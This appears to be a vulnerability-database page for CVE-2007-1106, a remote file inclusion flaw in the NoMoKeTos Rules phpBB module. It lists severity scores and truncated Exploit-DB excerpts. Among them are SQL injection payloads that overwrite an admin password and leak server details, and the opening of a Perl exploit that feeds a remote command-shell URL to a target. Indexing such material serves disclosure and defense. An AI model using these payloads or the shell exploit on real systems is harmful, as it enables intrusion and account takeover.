CVE-2007-1106
published 2007-02-26CVE-2007-1106: PHP remote file inclusion vulnerability in includes/functions_nomoketos_rules.php in the NoMoKeTos Rules 0.0.1 module for phpBB allows remote attackers to…
PriorityP338medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.65%
83.7th percentile
PHP remote file inclusion vulnerability in includes/functions_nomoketos_rules.php in the NoMoKeTos Rules 0.0.1 module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nomoketos_rules | nomoketos_rules | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Irola My-Time 3.5 - SQL Injection
exploitdb·2007-11-23
CVE-2007-6217 Irola My-Time 3.5 - SQL Injection
Irola My-Time 3.5 - SQL Injection
---
Aria-Security Team
http://Aria-Security.Net
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1106
Vendor: http://www.irola.com
Username/Password Fields can run SQL Queries. Therefore:
We get the Tables:
UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone
Useful Injection: (changes admin's passwsord to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--
these may help the attacker to get more info:
1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,syst
Exploit-DB
phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion
exploitdb·2007-02-24
CVE-2007-1106 phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion
phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion
---
#!/usr/bin/perl
#
#phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit
#
#Coded by bd0rk || SOH-Crew
#
#Usage: exploit.pl [target] [cmd shell] [shell variable]
#
#Greetings: str0ke, TheJT, Kacper, Lu7k, Maik
#
#Vulnerable Code: include_once($phpbb_root_path . 'includes/functions_admin.'.$phpEx);
#
# vendor: http://www.nomoketo.de/MODs/nomoketos_rules.zip
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'includes/functions_nomoketos_rules.php?phpbb_root_path='.$Pathtocmd
Exploit-DB
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
exploitdb·2007-02-05
CVE-2007-0811 Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
---
Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
+ The following proof-of-concept is also available:
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
AmesianX, RC_No1 in powerhacker.net (
No writeups or analysis indexed.
http://osvdb.org/37000http://www.securityfocus.com/bid/22713http://www.vupen.com/english/advisories/2007/0735https://exchange.xforce.ibmcloud.com/vulnerabilities/32686https://www.exploit-db.com/exploits/3373http://osvdb.org/37000http://www.securityfocus.com/bid/22713http://www.vupen.com/english/advisories/2007/0735https://exchange.xforce.ibmcloud.com/vulnerabilities/32686https://www.exploit-db.com/exploits/3373
2007-02-26
Published